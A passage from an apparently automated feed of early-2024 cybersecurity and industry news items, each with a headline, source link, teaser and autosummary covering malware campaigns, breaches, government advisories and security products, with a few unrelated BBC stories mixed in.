  The threat actor known as Blind Eagle has been observed using a loader malware called Ande Loader to deliver remote access trojans (RATs) like Remcos RAT and NjRAT. The attacks, which take the form of phishing emails, targeted Spanish-speaking users in the manufacturing industry based in North America, eSentire said. Blind Eagle (aka APT-C-36) is a financially motivated threat actor& "

  Autosummary: "

  ---

  Tech support firms Restoro, Reimage fined $26 million for scare tactics

  industry
  2024-03-14 https://www.bleepingcomputer.com/news/security/tech-support-firms-restoro-reimage-fined-26-million-for-scare-tactics/
  Tech support companies Restoro and Reimage will pay $26 million to settle charges that they used scare tactics to trick their customers into paying for unnecessary computer repair services. [...] "

  Autosummary: While the devices used to test the purchased software and services had no performance or security issues and were also running antivirus software, scanning them "revealed" hundreds of issues requiring repair, including "PC Privacy issues," "Junk files," "Crashed Programs," and "Broken Registry issues. "

  ---

  Image-based phishing tactics evolve

  financial industry
  2024-03-12 https://www.helpnetsecurity.com/2024/03/12/image-based-phishing-attacks/
  

  While 70% of organizations feel their current security stacks are effective against image-based and QR code phishing attacks, 76% were still compromised in the last 12 months, according to IRONSCALES and Osterman Research. IT pros are highly aware of emerging types of phishing attacks 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. 76% of organizations were still compromised by … More →

  The post Image-based phishing tactics evolve appeared first on Help Net Security.

  "

  Autosummary: IT pros are highly aware of emerging types of phishing attacks 93% of IT and security professionals are aware of image-based phishing attacks targeting their organizations, and 79% say the same about QR code attacks. "

  ---

  AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights

  industry
  2024-03-12 https://www.helpnetsecurity.com/2024/03/12/auditboard-ai/
  

  AuditBoard revealed powerful new AI, analytics, and annotation capabilities to help corporate risk, compliance, and assurance teams, including internal audit and SOX functions, improve collaboration with stakeholders, do more with less, and deliver more timely insights. These robust new enhancements to the internal audit, SOX, and controls management capabilities of AuditBoard’s modern connected risk platform deliver relevant insights faster while navigating a dynamic market environment rife with increasing risks, regulations, and business requirements: AuditBoard AI … More →

  The post AuditBoard unveils AI, analytics, and annotation capabilities to deliver more timely insights appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Email security trends in the energy and infrastructure sector

  industry
  2024-03-11 https://www.helpnetsecurity.com/2024/03/11/energy-and-infrastructure-organizations-attacks-video/
  

  In this Help Net Security video, Mike Britton, CISO at Abnormal Security, discusses how energy and infrastructure organizations face an increased risk of business email compromise and vendor email compromise attacks. According to Abnormal Security data, from February 2023 to July 2023, the average number of BEC weekly attacks was 0.53 per 1,000 mailboxes. BEC attacks increased by 18% in the following six months, reaching a weekly average of 0.63 attacks per 1,000 mailboxes. Business … More →

  The post Email security trends in the energy and infrastructure sector appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Advanced AI, analytics, and automation are vital to tackle tech stack complexity

  industry
  2024-03-11 https://www.helpnetsecurity.com/2024/03/11/advanced-ai-analytics-and-automation-are-vital-to-tackle-tech-stack-complexity/
  

  97% of technology leaders find traditional AIOps models are unable to tackle the data overload, according to Dynatrace. Organizations are drowning in data The research reveals that organizations are continuing to embrace multi-cloud environments and cloud-native architectures to enable rapid transformation and deliver secure innovation. However, despite the speed, scale, and agility enabled by these modern cloud ecosystems, organizations are struggling to manage the explosion of data they create. These research findings underscore the need … More →

  The post Advanced AI, analytics, and automation are vital to tackle tech stack complexity appeared first on Help Net Security.

  "

  Autosummary: By unifying diverse data, retaining its context, and powering analytics and automation with a hypermodal AI that combines multiple techniques, including causal, predictive, and generative AI, teams can unlock a wealth of insights from their data to drive smarter decision-making, intelligent automation, and more efficient ways of working,” Greifeneder concluded. "

  ---

  Currys takeover move scrapped by US firm Elliot

  industry
  2024-03-11 https://www.bbc.co.uk/news/business-68532445
  Investment firm Elliot says it will not bid for the retailer after being rejected "multiple times". "

  Autosummary: "

  ---

  New Banking Trojan CHAVECLOAK Targets Brazilian Users via Phishing Tactics

  financial exploits latam industry
  2024-03-11 https://thehackernews.com/2024/03/new-banking-trojan-chavecloak-targets.html
  Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that"s propagated via phishing emails bearing PDF attachments. "This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said. The attack chain involves the use of "

  Autosummary: "The malware facilitates various actions to steal a victim"s credentials, such as allowing the operator to block the victim"s screen, log keystrokes, and display deceptive pop-up windows," Lin said. "

  ---

  Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications

  industry
  2024-03-08 https://www.helpnetsecurity.com/2024/03/08/identiv-bitse-io-3-0/
  

  Identiv launched bitse.io 3.0, the latest iteration of its global IoT connecting cloud platform. The updated platform offers advanced features designed to transform applications in supply chain management, brand protection, and customer engagement. bitse.io simplifies the deployment of innovative IoT applications, enabling customers to rapidly bring solutions with the latest radio-frequency identification (RFID) and IoT technologies to market. With native support for encrypted and tamper-proof tags based upon the top RFID and IoT chips from … More →

  The post Identiv releases bitse.io 3.0, simplifying the deployment of IoT applications appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Web-based PLC malware: A new potential threat to critical infrastructure

  exploits industry
  2024-03-07 https://www.helpnetsecurity.com/2024/03/07/web-based-plc-malware/
  

  A group of researchers from Georgia Tech’s College of Engineering have developed web-based programmable logic controller (PLC) malware able to target most PLCs produced by major manufacturers. “Our Web-Based (WB) PLC malware resides in PLC memory, but ultimately gets executed client-side by various browser-equipped devices throughout the ICS environment. From there, the malware uses ambient browser-based credentials to interact with the PLC’s legitimate web APIs to attack the underlying real-world machinery,” the researchers explained. What … More →

  The post Web-based PLC malware: A new potential threat to critical infrastructure appeared first on Help Net Security.

  "

  Autosummary: The advantages of web-based PLC malware PLCs having embedded webservers means that attackers don’t need network or physical access to deliver the malware – they can simply lure an ICS operator to view an attacker-controlled website that exploits a cross-origin resource sharing (CORS) misconfiguration vulnerability to transfer a web page with malicious JavaScript code to the webserver. "

  ---

  CISA warns against using hacked Ivanti devices even after factory resets

  industry
  2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-warns-against-using-hacked-ivanti-devices-even-after-factory-resets/
  The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who breached Ivanti appliances using one of multiple actively exploited vulnerabilities can maintain root persistence even after performing factory resets. [...] "

  Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours, The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "

  ---

  New Bifrost malware for Linux mimics VMware domain for evasion

  exploits industry Linux
  2024-02-29 https://www.bleepingcomputer.com/news/security/new-bifrost-malware-for-linux-mimics-vmware-domain-for-evasion/
  A new Linux variant of the Bifrost remote access trojan (RAT) employs several novel evasion techniques, including the use of a deceptive domain that was made to appear as part of VMware. [...] "

  Autosummary: "

  ---

  CISA cautions against using hacked Ivanti VPN gateways even after factory resets

  industry
  2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-cautions-against-using-hacked-ivanti-vpn-gateways-even-after-factory-resets/
  The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who hack Ivanti VPN appliances using one of multiple actively exploited vulnerabilities may be able to maintain root persistence even after performing factory resets. [...] "

  Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours, The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online. "

  ---

  Five Eyes Agencies Expose APT29"s Evolving Cloud Attack Tactics

  industry
  2024-02-27 https://thehackernews.com/2024/02/five-eyes-agencies-expose-apt29s.html
  Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the "

  Autosummary: "

  ---

  Oil spill spreads across Caribbean to Bonaire

  industry
  2024-02-27 https://www.bbc.co.uk/news/world-latin-america-68413102
  The oil from a capsized barge off the coast of Tobago is threatening Bonaire"s mangrove forests. "

  Autosummary: "

  ---

  Steel giant ThyssenKrupp confirms cyberattack on automotive division

  industry ciber
  2024-02-26 https://www.bleepingcomputer.com/news/security/steel-giant-thyssenkrupp-confirms-cyberattack-on-automotive-division/
  Steel giant ThyssenKrupp confirms that hackers breached systems in its Automotive division last week, forcing them to shut down IT systems as part of its response and containment effort. [...] "

  Autosummary: "

  ---

  A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit

  industry
  2024-02-26 https://securityaffairs.com/159611/hacking/thyssenkrupp-automotive-body-solutions-bu-cyberattack.html
  ThyssenKrupp disclosed a security breach that impacted its automotive division last week, in response to the attack the company shut down IT systems. Steel giant ThyssenKrupp disclosed a security breach that impacted its Automotive division last week. The company shut down IT systems in response to the attack. The news of the attack was reported by the […] "

  Autosummary: A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit Pierluigi Paganini February 26, 2024 February 26, 2024 ThyssenKrupp disclosed a security breach that impacted its automotive division last week, in response to the attack the company shut down IT systems. "

  ---

  SVR Cyber Actors Adapt Tactics for Initial Cloud Access

  industry
  2024-02-23 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a
  

  How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure

  OVERVIEW

  This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.

  The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.

  This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.

  To download the PDF version of this report, click here.

  PREVIOUS ACTOR ACTIVITY

  The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

  SVR actors are also known for:

  • The supply chain compromise of SolarWinds software.

  • Autosummary: How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure OVERVIEW This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear. PREVIOUS ACTOR ACTIVITY The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain.It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. MITIGATION AND DETECTION A number of mitigations will be useful in defending against the activity described in this advisory: Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises.The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s "

    ---

    Critics say Final Fantasy Rebirth a stunning sequel

    industry
    2024-02-22 https://www.bbc.co.uk/news/newsbeat-68368620
    Reviews of the highly anticipated follow-up to 2020"s Remake praise its open world and story. "

    Autosummary: "

    ---

    Apple’s iMessage gains industry-leading quantum security

    industry
    2024-02-21 https://www.computerworld.com/article/3713081/apples-imessage-gains-industry-leading-quantum-security.html#tk.rss_security
    

    Apple is preparing for future threats to iMessage by introducing upgraded encryption for its messaging service by using quantum computers.

    Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple"s messaging system being more secure against both current and future foes.

    What is the protection?

    Announced on Apple’s Security Research blog, the new iMessage protection is called PQ3 and promises the “strongest security properties of any at-scale messaging protocol in the world.”

    To read this article in full, please click here

    "

    Autosummary: In this case, Apple’s security teams asked themselves what might happen if hackers, criminals, or state-backed rogue surveillance firms gathered vast quantities of encrypted iMessage data today in order to break that encryption using quantum computers tomorrow. Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple"s messaging system being more secure against both current and future foes. Apple has submitted PQ3 to two leading security researchers who have verified the technology — Professor David Basin of the Information Security Group at ETH in Zurich, Switzerland, and Douglas Stebila, a University of Waterloo Professor. "

    ---

    Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric

    exploits ransomware industry
    2024-02-20 https://securityaffairs.com/159353/hacking/cactus-ransomware-gang-schneider-electric.html
    The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric. Schneider Electric is a multinational company that specializes in energy management, industrial automation, […] "

    Autosummary: Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric Pierluigi Paganini February 20, 2024 February 20, 2024 The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. "

    ---

    New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

    industry
    2024-02-20 https://thehackernews.com/2024/02/new-malicious-pypi-packages-caught.html
    Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code. The packages, named NP6HelperHttptest and NP6HelperHttper, were each downloaded 537 and 166 times, respectively, "

    Autosummary: "

    ---

    ManageEngine unveils ML-powered exploit triad analytics feature

    exploits industry
    2024-02-20 https://www.helpnetsecurity.com/2024/02/20/manageengine-log360-siem-solution/
    

    ManageEngine released an ML-powered exploit triad analytics feature in its SIEM solution, Log360. Now, enterprises can knowledgeably trace the path of adversaries and mitigate breaches by providing complete contextual visibility into the exploit triad: users, entities and processes. Addressing the critical need for faster breach response “Today’s cyberthreats masterfully blend into the fabric of legitimate activity, weaponizing stolen credentials, mimicking trusted processes and exploiting human vulnerabilities. These insidious tactics create a critical challenge: an extended … More →

    The post ManageEngine unveils ML-powered exploit triad analytics feature appeared first on Help Net Security.

    "

    Autosummary: Highlights of ML-powered exploit triad analytics Log360’s threat detection and incident response (TDIR) module, Vigil IQ, features a dual-layered threat detection system released last year. "

    ---

    Iranian Hackers Target Middle East Policy Experts with New BASICSTAR Backdoor

    industry
    2024-02-19 https://thehackernews.com/2024/02/iranian-hackers-target-middle-east.html
    The Iranian-origin threat actor known as Charming Kitten has been linked to a new set of attacks aimed at Middle East policy experts with a new backdoor called BASICSTAR by creating a fake webinar portal. Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a "

    Autosummary: Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a wide net in their targeting, often singling out think tanks, NGOs, and journalists. "

    ---

    How BRICS Got “Rug Pulled” – Cryptocurrency Counterfeiting is on the Rise

    industry
    2024-02-19 https://securityaffairs.com/159318/cyber-crime/resecurity-warns-cryptocurrency-counterfeiting.html
    Resecurity has identified an increasing trend of cryptocurrency counterfeiting, the experts found several tokens impersonating major brands, government organizations and national fiat currencies. Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection for Fortune 100 companies by cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies. […] "

    Autosummary: A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. "

    ---

    The staff shortage in India"s special effects industry

    industry
    2024-02-19 https://www.bbc.co.uk/news/business-68017347
    With international studios sending more work to India, the industry is struggling to train enough staff. "

    Autosummary: "

    ---

    Offenders confused about ethics of AI child abuse

    industry
    2024-02-15 https://www.bbc.co.uk/news/technology-68297336
    A charity warns that creating or viewing such images is still illegal, even if the children are not real. "

    Autosummary: "

    ---

    5 free digital forensics tools to boost your investigations

    industry
    2024-02-15 https://www.helpnetsecurity.com/2024/02/15/free-digital-forensics-tools/
    

    Digital forensics plays a crucial role in analyzing and addressing cyberattacks, and it’s a key component of incident response. Additionally, digital forensics provides vital information for auditors, legal teams, and law enforcement agencies in the aftermath of an attack. Many cutting-edge digital forensics tools are on the market, but for those who cannot afford them, here’s a list of great free solutions to get you started. Autopsy Autopsy is a digital forensics platform widely employed … More →

    The post 5 free digital forensics tools to boost your investigations appeared first on Help Net Security.

    "

    Autosummary: It scans various inputs, including disk images, files, and directories, extracting organized information like email addresses, credit card numbers, JPEG images, and JSON fragments. "

    ---

    Understanding the tactics of stealthy hunter-killer malware

    exploits industry
    2024-02-15 https://www.helpnetsecurity.com/2024/02/15/hunter-killer-malware/
    

    Picus Security has revealed a rise in hunter-killer malware, highlighting a significant shift in adversaries’ capability to pinpoint and thwart advanced enterprise defenses, including next-gen firewalls, antivirus programs, and EDR systems. There was a 333% increase in malware that can actively target defensive systems in an attempt to disable them. The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and … More →

    The post Understanding the tactics of stealthy hunter-killer malware appeared first on Help Net Security.

    "

    Autosummary: The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and proactively seek out and impair security tools, firewalls, logging services, audit systems, and other protective measures within an infected system. "

    ---

    Rise in cyberwarfare tactics fueled by geopolitical tensions

    industry ciber
    2024-02-14 https://www.helpnetsecurity.com/2024/02/14/matt-shelton-google-cloud-threat-actors-trends/
    

    In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. How have cyber threats evolved over the last year, and what trends are we seeing regarding attack vectors and methodologies? To some extent, cybersecurity fatigue and complacency have left gaps where threat actors … More →

    The post Rise in cyberwarfare tactics fueled by geopolitical tensions appeared first on Help Net Security.

    "

    Autosummary: In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. Caveat, when talking about public-private partnerships – what is needed is real operational and ongoing public-private collaboration is essential for sharing information, developing best practices, and mitigating risks and is essential for building a more secure and resilient cyber ecosystem. To some extent, cybersecurity fatigue and complacency have left gaps where threat actors have exploited old vulnerabilities, including gaps in logging and patching, to get a stalwart beachhead into the network. "

    ---

    Cybersecurity Tactics FinServ Institutions Can Bank On in 2024

    financial industry ciber
    2024-02-14 https://thehackernews.com/2024/02/cybersecurity-tactics-finserv.html
    The landscape of cybersecurity in financial services is undergoing a rapid transformation. Cybercriminals are exploiting advanced technologies and methodologies, making traditional security measures obsolete. The challenges are compounded for community banks that must safeguard sensitive financial data against the same level of sophisticated threats as larger institutions, but often with more "

    Autosummary: Financial firms report 703 cyberattack attempts per week.1 On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year.2 On average, financial services businesses take an average of 233 days to detect and contain a data breach.3 43% of senior bank executives don"t believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack.4 The average data breach cost in financial services is $5.72 million per incident.5 State-sponsored cyberattacks also pose a unique threat to the financial sector. Similarly, in recent times, there has been a concerning trend where major service providers catering to small-medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GBLA, PCI DSS, SOX, and more.Advanced Cloud Security Strategies Cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions.This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning.Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank"s overall cybersecurity posture. "

    ---

    The art of digital sleuthing: How digital forensics unlocks the truth

    industry
    2024-02-14 https://www.welivesecurity.com/en/cybersecurity/digital-forensics-unlocks-truth/
    Learn how the cyber variety of CSI works, from sizing up the crime scene and hunting for clues to piecing together the story that the data has to tell "

    Autosummary: As such, a typical digital forensics report: provides background information on the case, defines the scope of the investigation together with its objectives and limitations, describes the methods and techniques used, details the process of acquiring and preserving digital evidence, presents the results of the analysis, including discovered artifacts, timelines, and patterns, summarizes the findings and their significance in relation to the goals of the investigation Lest we forget: the report needs to adhere to legal standards and requirements so that it can withstand legal scrutiny and serve as a crucial document in legal proceedings. With that in mind, digital forensics has a role to play in various contexts, including crime investigations, incident response, divorce and other legal proceedings, employee misconduct probes, counterterrorism efforts, fraud detection and data recovery. This art of uncovering, analyzing and interpreting digital evidence has seen substantial growth particularly in investigations involving various kinds of fraud and cybercrime, tax evasion, stalking, child exploitation, intellectual property theft, and even terrorism. "

    ---

    The future of cybersecurity: Anticipating changes with data analytics and automation

    industry ciber
    2024-02-13 https://www.helpnetsecurity.com/2024/02/13/mick-baccio-splunk-data-analytics-automation-role/
    

    In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. He points out the changes in threat tactics, the significance of automation in reducing human error, challenges in implementing data analytics, and envisions a future where AI-assistants transform cybersecurity operations. How have cybersecurity threats evolved in recent years, and what role do data analytics … More →

    The post The future of cybersecurity: Anticipating changes with data analytics and automation appeared first on Help Net Security.

    "

    Autosummary: The landscape of cyber threats continues to further evolve, and recent high-profile data breaches (MoveIT, accelion, goanywhere, etc.) underscore the gravity of the shift. For instance, complex multi-step incident response workflows, such as quarantining a host, blocking an indicator, and searching for additional compromised assets, can be automated to minimize the likelihood of costly oversights or missed steps.In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses the future of cybersecurity, emphasizing the importance of data analytics and automation in addressing evolving threats. "

    ---

    PikaBot Resurfaces with Streamlined Code and Deceptive Tactics

    industry
    2024-02-13 https://thehackernews.com/2024/02/pikabot-resurfaces-with-streamlined.html
    The threat actors behind the PikaBot malware have made significant changes to the malware in what has been described as a case of "devolution." "Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications," Zscaler ThreatLabz researcher Nikolaos "

    Autosummary: "

    ---

    Ransomware tactics evolve, become scrappier

    exploits industry
    2024-02-12 https://www.helpnetsecurity.com/2024/02/12/ransomware-attacks-rise/
    

    As we enter 2024, ransomware remains the most significant cyberthreat facing businesses, according to Malwarebytes. Malwarebytes reveals that the United States accounted for almost half of all ransomware attacks in 2023. “Small and medium-sized organizations face a deluge of cyber threats daily including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown … More →

    The post Ransomware tactics evolve, become scrappier appeared first on Help Net Security.

    "

    Autosummary: The repeated use of zero-days also signaled a new level of sophistication making CL0P the second most active “big game” ransomware group of 2023, outpacing rivals that were active in every month of the year compared to just a few weeks of activity from CL0P. Lockbit also remained the most widely used ransomware-as-a-service, which accounted for more than twice as many attacks as its nearest competitor in 2023. "

    ---

    Brazil miss out on Olympics as Argentina win to qualify

    latam industry
    2024-02-12 https://www.bbc.co.uk/sport/football/68270697
    Two-time gold medallists Brazil will not feature in the Olympic men"s football event for the first time since 2004 after losing to Argentina. "

    Autosummary: "

    ---

    Integrating cybersecurity into vehicle design and manufacturing

    industry ciber
    2024-02-12 https://www.helpnetsecurity.com/2024/02/12/yaron-edan-ree-automotive-electric-vehicles-cybersecurity/
    

    In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Edan highlights the challenges of technological advancements and outlines strategies for automakers to address cyber threats effectively. Additionally, he emphasizes the importance of consumer awareness in ensuring vehicle security. Can you describe the state of cybersecurity in the automotive industry, especially in the context of electric and connected … More →

    The post Integrating cybersecurity into vehicle design and manufacturing appeared first on Help Net Security.

    "

    Autosummary: Now that our vehicles are becoming increasingly connected to the internet can go through Over-the-Air (OTA) updates, use remote management, contain Advanced Driver Assistance Systems (ADAS), and employ AI, the potential avenues for cyberattacks have expanded for threat actors to exploit in a significant way. Once an automaker is compliant with certain regulatory rules, they will then ask the regulatory bodies to come to conduct an onsite visit, where they conduct an audit for months at a time, trying to hack each layer they can and look for any areas of weakness, to identify what needs to be patched up.In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Implement strong network security measures, including firewalls, detection systems, and encryption, to monitor your network traffic for any anomalies regularly. "

    ---

    Trinidad and Tobago hit by mystery ship oil spill

    industry
    2024-02-11 https://www.bbc.co.uk/news/world-latin-america-68266339
    At least 15km (nine miles) of Tobago"s coast is already affected after a mysterious ship overturned. "

    Autosummary: "

    ---

    Cybersecurity in the automotive industry: Ensuring compliance with UNECE regulations

    industry ciber
    2024-02-07 https://ics-cert.kaspersky.com/publications/cybersecurity-in-the-automotive-industry-ensuring-compliance-with-unece-regulations/
    What UN Regulations 155 and 156 require from vehicle manufacturers in reality, and how to ensure compliance with requirements and prepare for certification if necessary "

    Autosummary: The table below presents a list of vehicle categories covered by the requirements of UN Regulations 155 and 156: Vehicle category Category description Applicable requirements L6 Four-wheeled vehicles with a mass not exceeding 350 kg, engine displacement of 50 cc or less, and maximum design speed of 45 km/h UN 155, if the vehicle complies with Level 3 automation or higher L7 Four-wheeled vehicles with a mass not exceeding 400 kg and maximum continuous rated power of no more than 15 kW UN 155, if the vehicle complies with Level 3 automation or higher M Vehicles with four or more wheels, designed to carry passengers UN 155 and UN 156 N Vehicles with four or more wheels, designed to carry cargo UN 155 and UN 156 O Trailers with at least one ECU UN 155 and UN 156 R Agricultural trailers UN 156 S Interchangeable towed agricultural and logging equipment UN 156 T Any motorized, wheeled, or tracked agricultural equipment with at least two wheeled axles, capable of moving faster than 6 km/h UN 156 Starting in July 2024, UN Regulations 155 and 156 will become mandatory not only for new types of vehicles, but also for all new vehicles produced. The automotive industry has a geographically and hierarchically distributed and functionally complex supply chain that includes: the vehicle manufacturer itself (OEM – Original Equipment Manufacturer); suppliers of individual vehicle systems and modules (Tier 1 suppliers), such as the gearbox, infotainment module, or engine control unit; their suppliers that make the individual components of the systems and modules, for example, microcircuits, sensors, controllers, operating systems, bearings, actuators, etc.The broad range of functions (engine control, fuel system control, passenger safety, autopilot, infotainment system), architectures of communication interfaces used by individual components (CAN, LIN, Ethernet, Wi-Fi), communication links with external services and entities (Bluetooth, Wi-Fi, LTE) create a huge cyberattack surface in vehicles. Risks for the manufacturer’s ICT infrastructure A vehicle manufacturer is an industrial organization whose structure combines the ordinary ICT infrastructure of a back office, i.e., auxiliary and supporting business units (accounting department, legal department, logistical support for the office, etc.), with the infrastructure of the development unit, the production segment, and the servers of the supporting infrastructure. The consequences of a successful attack on a vehicle may include the theft or modification of data (personal data, payment information, and other user data), installation of malicious code/firmware, disruption or manipulation of individual vehicle functions, theft of the vehicle, physical damage to the vehicle, and injury or death of drivers, passengers, and pedestrians. Relevant cybersecurity risks In the automotive industry, cybersecurity requirements apply at least to the following objects: the product itself – that is, the vehicle and its components; supporting infrastructure – for example, servers for updating the firmware of electronic control units (ECU); the manufacturer’s ICT infrastructure, whose security is important for the development, manufacture, and subsequent support of products; supply chain of a vehicle’s individual electronic components and systems. Production phase According to ISO 21434, when the production phase begins, it is necessary to analyze all production operations and develop a production control plan that includes: a description of the steps to implement the cybersecurity requirements for the production, operation and maintenance and decommissioning phases (the standard combines these phases into a single post-development phase); a list of equipment and tools for the production phase; security controls to prevent unauthorized changes in production; procedures for evaluating the completeness of implementation and validating the security requirements for the production, operation and maintenance and decommissioning phases. To maintain the cybersecurity of the vehicle, it is necessary to: monitor information about discovered vulnerabilities and changes in the threat landscape; establish security monitoring of the supporting infrastructure and incident response processes; establish monitoring of information about compromised suppliers and processes for responding to incidents involving supply chains and trusted (authorized) partners; rapidly respond to vulnerabilities, threats and incidents, including developing and installing patches, notifying users, and reassessing risks. The following are examples of attacks on supporting infrastructure: uploading and installing a fake update; uploading fake backup copies of data or configurations; sending illegitimate commands from an adversary’s C&C server to a vehicle; attack on the servers of supporting infrastructure (for example, network management servers for charging stations) and the subsequent leaking of personal data and payment information; changes made while servicing a vehicle at an auto repair shop that result in a breach of security (configuration changes, deployment of a rootkit, etc.).To obtain them, a vehicle manufacturer must demonstrate that the organizational processes listed above comply with the following requirements as part of cybersecurity management and update management: threat assessment and risk analysis (TARA); continuous monitoring, incident detection and response; vulnerability management; component supply chain management and service management; security update management; notification of supervisory bodies regarding the results of cybersecurity monitoring, including any cyberattacks. Risks of attacks on supporting infrastructure can be minimized by implementing a proper network topology and segmentation, secure protocols for authentication, authorization, and data encryption, antivirus protection, procedures for controlling access to the system, vulnerability management, and incident monitoring and response. An acceptable option for implementing cybersecurity 